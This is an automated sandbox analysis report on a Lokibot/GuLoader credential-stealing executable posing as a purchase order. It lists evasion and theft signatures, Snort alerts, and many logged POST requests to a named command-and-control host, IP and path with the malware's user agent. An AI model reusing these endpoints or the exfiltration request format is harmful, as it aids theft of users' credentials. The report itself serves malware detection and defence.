Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report PO-A2174679-06.exe

Overview

General Information

Sample Name:PO-A2174679-06.exe
Analysis ID:356484
MD5:fdec289fb4626dd56bbb55770ae5f432
SHA1:1a1f324185e6114fb1362b00f27fe8009a202361
SHA256:eb53256b217e27a7ab0f71be2181599a79dc0569dea7fdbc5b32cf96a6bc9109
Tags:exe

Most interesting Screenshot:

Detection

GuLoader Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected Lokibot
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • PO-A2174679-06.exe (PID: 6600 cmdline: 'C:\Users\user\Desktop\PO-A2174679-06.exe' MD5: FDEC289FB4626DD56BBB55770AE5F432)
    • PO-A2174679-06.exe (PID: 5424 cmdline: 'C:\Users\user\Desktop\PO-A2174679-06.exe' MD5: FDEC289FB4626DD56BBB55770AE5F432)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
      0000000B.00000002.501855027.0000000000A83000.00000004.00000020.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        Process Memory Space: PO-A2174679-06.exe PID: 5424JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
          Process Memory Space: PO-A2174679-06.exe PID: 5424JoeSecurity_Lokibot_1Yara detected LokibotJoe Security
            Process Memory Space: PO-A2174679-06.exe PID: 5424JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
              Click to see the 2 entries

              Sigma Overview

              No Sigma rule has matched

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Multi AV Scanner detection for submitted fileShow sources
              Source: PO-A2174679-06.exeVirustotal: Detection: 16%Perma Link

              Compliance:

              barindex
              Uses 32bit PE filesShow sources
              Source: PO-A2174679-06.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49732 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49732 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49732 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49732 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49733 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49733 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49733 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49733 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49734 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49734 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49734 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49734 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49737 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49737 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49737 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49737 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49738 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49738 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49738 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49738 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49739 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49739 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49739 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49739 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49740 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49740 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49740 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49740 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49741 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49741 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49741 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49741 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49743 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49743 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49743 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49743 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49744 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49744 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49744 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49744 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49745 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49745 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49745 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49745 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49746 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49746 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49746 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49746 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49747 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49747 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49747 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49747 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49748 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49748 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49748 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49748 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49749 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49749 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49749 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49749 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49750 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49750 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49750 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49750 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49751 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49751 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49751 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49751 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49752 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49752 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49752 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49752 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49753 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49753 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49753 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49753 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49755 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49755 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49759 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49759 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49759 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49759 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49761 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49763 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49763 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49763 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49763 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49765 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49766 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49767 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49768 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49769 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49770 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49770 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49770 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49770 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49771 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49771 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49771 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49771 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49772 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49773 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49774 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49775 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49776 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49777 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49778 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49779 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49779 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49779 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49779 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 192.185.78.145:80
              Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49780 -> 192.185.78.145:80
              Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 192Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
              Source: global trafficHTTP traffic detected: POST /ovation/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: accessasia.com.hkAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EB0DDECContent-Length: 165Connection: close
